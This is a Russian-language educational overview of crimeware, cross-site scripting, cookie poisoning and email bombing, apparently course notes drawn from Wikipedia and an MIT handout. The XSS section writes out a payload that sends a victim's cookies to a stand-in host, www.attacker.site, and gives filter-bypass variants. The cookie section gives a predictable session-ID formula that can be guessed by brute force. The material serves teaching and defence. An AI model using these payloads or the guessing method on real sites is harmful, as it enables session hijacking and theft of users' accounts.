 |
Crimeware (по метериалам Wikipedia, см. http://en.wikipedia.org/wiki/Crimeware)
|
|
|
|
Crimeware является разновидностью malware, разработанной для автоматизации финансовых преступлений. Термин был введен Петером Кассиди, генеральным секретарем рабочей группы по антифишингу, чтобы отличать его от других видов вредоносных программ.
Crimeware (в отличии от spyware, adware и malware) при создани ориентирована на кражу персональных данных (посредством социальной инженерии и технических уловок), для того чтобы получить доступ в режиме реального времени к счетам пользователя в финансовых организациях и осуществить перехват денежных средств или выполнить неавтризованные транзакции с целью обогащения. Crimeware используется также часто для получения конфиденциальных данных.
Киберпреступники используют различные методы для кражи конфиденциальных данных:
· Crimeware может скрытно установить перехватчик ввода с клавиатуры, чтобы перехватывать имя и пароли пользователя, данные кредитных карт с последующей пересылкой владельцу Crimeware.
· Программа crimeware может также перенаправлять запросы WEB-браузера пользователя на фальшивые WEB-сайты, контролируемые злоумышленником, даже если пользователь печатает правильное доменное имя.
· Crimeware потенциально может украсть пароли, записанные в кэше системы пользователя.
· Crimeware может ждать, когда пользователь войдет в свой аккаунт финансовой организации, а затем скрытно передать параметры доступа.
· Crimeware может обеспечить удаленный доступ к приложениям, позволяя хакеру проникнуть в сеть со злонамеренными целями.
Crimeware может быть установлено на машине жертвы за счет:
· Уязвимостей WEB-приложений. Троянский конь Bankash.G, например, использует уязвимость Интернет эксплорера для кражи паролей, мониторинга ввода пользователя в web-почте и при работе с коммерческими сайтами.
|
|
|
· С помощью SMTP почтовых программ, атак портов, атак нулевого дня или за счет фишинг-сообщений. Домашние пользователи являются основными мишенями атак, так как они наименее защищены. Финансовые учреждения являются вторым по важности объектом таких атак. Такие атаки часто выглядят как обычные почтовые сообщения и содержат соответствующую фирменную информацию и адреса отправителя. Вредоносные почтовые сообщения используют социальную инженерию, чтобы заставить пользователя открыть приложение и загрузить тело сообщения.
· Файлообменные сети Р2Р могут использовать открытые порты для загрузки программ crimeware.
Cross-Site Scripting (CSS). (описание CSS сделано на основе Cross Site Scripting (XSS) Explained, Cross Site Scripting или http://courses.csail.mit.edu/6.857/2008/handouts/css-explained.pdf) является одной из наиболее широко распространенных сетевых атак, преследующих цель, получение персональных данных с помощью WEB-технологии (иногда этот вид атаки называют "HTML injection"). Задача решается за счет выполнения определенного Javascript'а в browser'е жертвы. При этом получается некоторая информация, содержащаяся на машине жертвы (например, cookies). Метод не наносит непосредственного вреда, но может быть прелюдией более серьезной атаки. Атакер может получить полный перечень cookies, имеющихся на машине жертвы. Смотри также http://www.veracode.com/security/xss.
Такой скрипт считывает часть HTTP-запроса (обычно параметры, реже HTTP-заголовки и проходы). Предположим, что имеется скрипт welcome.cgi, а его параметр - name. Он может работать следующим образом:
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host: www.vulnerable.site
Откликом будет
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker <BR>
Welcome to our system
...
</HTML>
Атакер пытается спровоцировать клиента-жертву на нажатие своей ссылки (например, www.valnerable.site). Такая ссылка может выглядеть как:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>.
|
|
|
Оклик сайта будет иметь вид:
<HTML>
<Title>>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
Браузер жертвы будет интерпретировать этот отклик как страницу HTML, содержащую фрагмент кода JavaScript. Этот код при исполнении позволяет получить доступ ко всем cookies, принадлежащих сайту www.vulnerable.site. Собственно атакой является отсылка всех этих cookies атакеру. Вредоносной ссылкой может быть:
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)</script>
Страница же отклика должна иметь вид:
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
Броузер немедленно при загрузке этой страницы исполнит встроенный Javascript и пошлет запрос "collect.cgi script" по адресу www.attacker.site, со значением cookies = www.vulnerable.site. Cookies могут содержать аутентификационные и авторизационные данные, а это уже представляет серьезную опасность. Наглядную диаграмму диалога в случае атаки CSS можно найти в одной из ссылок, приведенных в начале описания этого типа атак.
Для запуска скрипта возможно использование не только тэгов типа <SCRIPT>. Например:
· Вместо <SCRIPT>... </SCRIPT> можно применить <img src="javascript:..."> (удобно для узлов, где осуществляется фильтрация тэгов <SCRIPT>).
· Вместо <SCRIPT>... </SCRIPT> можно также использовать <script src="http://...">. Такой прием применим, когда скрипт невелик или содержит скрытые символы.
Существуют средства повышения безопасности в отношении атак CSS:
1. Входная фильтрация данных и выявление определенных скриптов (детектирование метки <script> с последующим распознаванием параметра name. Этот путь имеет определенные недостатки:
o Нужно, чтобы прикладной программист хорошо разбирался в проблемах безопасности.
o Требуется перекрыть все возможные источники входных данных (параметры запроса, параметры тела POST-запроса и HTTP-заголовки.
o Метод не может защитить от уязвимостей сторонних скриптов/серверов (которые указывают проход к ресурсу).
2. Выходная фильтрация, которая предполагает просмотр данных пользователя, которые он посылает браузеру. Хорошим примером был бы скрипт, который заносит входную информацию в базу данных и в дальнейшем фильтрует информацию, которая извлекается оттуда и направляется в виде отклика.
|
|
|
3. Установка прикладного Firewall, который перехватывает XSS-атаки прежде чем они достигнут WEB-сервера, блокирует работу потенциально опасных скриптов. Прикладной Firewall может перекрыть все входные методы, включая скрипты третьей стороны.
Взлом WEB-приложений с помощью "отравленных" Cookie. (см. Hacking Web Applications Using Cookie Poisoning). Данный вид атаки имеет целью нарушение конфиденциальности путем манипулирования cookie сессии. При этом может быть реализована фальсификация идентичности узла или человека и хакер в этом случае может выполнять определенные действия от имени ничего неподозревающего клиента. Cookie сессии, к сожалению, формируются без привлечения методов, гарантирующих безопасность.
Для гарантии безопасности клиент не должен быть способен угадать (подобрать) значения идентификатора сессии другого клиента. Более того клиент не должен быть способен предугадать очередное значение идентификатора сессии. У каждого идентификатора должно быть заранее оговоренное время жизни, чтобы минимизировать урон в случае кражи идентификатора.
Разные системы (ASP.NET, Apache Tomcat, Apache JServ, PHP и т.д.) генерируют cookie по-разному (смотри cookieReport.html). В одних случаях для формирования идентификаторов используются локальные часы, в других - генератор псевдослучайных чисел. Проблема в том, что в любом варианте имеются пути относительно простых схем угадывания идентификаторов с помощью предварительного анализа и перебора.
Наиболее широко используемая схема формирования сессий предполагает создание двух cookie. Первое cookie является просто счетчиком для отличия одной сессии от другой. Вторая составляющая представляет собой число, содержащее 8 десятичных цифр. Этот идентификатор вычисляется по формуле:
Cookie2=(31415821 × (t + m) mod 100000000,
где t - время GMT в секундах с момента 01/01/1970 00:00 (задается прикладным сервером), а m - число миллисекунд на счетчике тиков прикладного сервера. Следует заметить, что t может быть получено из заголовка Date HTTP. Зная это легко написать программу, которая восстановит Cookie. Для этого нужно послать чуть больше 1000 запросов.
Email bombing (бомбежка почтовыми сообщениями) представляет собой атаку почтового ящика или сервера огромным числом почтовых сообщений. Такая атака может закончиться крушением почтового ящика или сервера, когда ресурсы диска будут исчерпаны.
|
|
|
